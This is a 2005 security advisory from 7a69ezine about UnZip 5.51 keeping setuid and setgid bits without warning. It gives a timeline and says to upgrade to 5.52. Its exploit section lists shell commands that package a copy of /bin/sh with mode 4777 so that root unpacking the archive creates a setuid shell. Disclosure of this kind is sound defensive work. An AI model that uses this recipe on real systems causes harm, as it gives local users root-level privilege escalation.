7a69Adv#22 - UNIX unzip keep setuid and setgid files
- ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#22
- ------------------------------------------------------------------
http://www.7a69ezine.org [26/01/2005]
- ------------------------------------------------------------------
Title: Unzip keep setuid and setgid files
Author: Albert Puigsech Galicia - <ripe@xxxxxxxxxxxxx>
Software: Unzip
Versions: >= 5.51
Remote: No
Exploit: yes
Severity: Low/Medium
- ------------------------------------------------------------------
I. Introduction.
UnZip is an extraction utility for archives compressed in .zip format. It's
compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary
objectives have been portability and non-MSDOS fuctionality. More info about
unzip on http://www.info-zip.org/pub/infozip/UnZip.html.
II. Description.
The unzip UNIX functionality allow you to maintain file permisions into
compressed files, and of course that includes the setuid bit. Because it does
not show a warning message before unpacking a setuid file is posible to create
a malicious ZIP file that creates an executable setuid.
III. Exploit
It's realy easy to test this vulnerability. You can create a malicious ZIP
file following this example:
$ cp /bin/sh .
$ chmod 4777 sh
$ zip malicious.zip sh
When another user (including root) unpacks the file, a setuid shell file will
be created without any warning, as you can see here:
# id
# unzip malicious.zip
Archive: malicious.zip
inflating: sh
# ls -l sh
-rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh
Of course ye need a local account on the system to execute the file, so it's
not a remote vulnerability.
IV. Patch
Upgrade to unzip 5.52.
V. Timeline
12/01/2005 - Bug discovered
16/01/2005 - Vendor contacted
21/01/2005 - Vendor response
25/01/2005 - Vendor patch provided
28/02/2005 - New versión published
28/02/2005 - Advisor published
VI. Extra data
You can find more 7a69ezine advisories on this following link:
http://www.7a69ezine.org/avisos/propios [spanish info]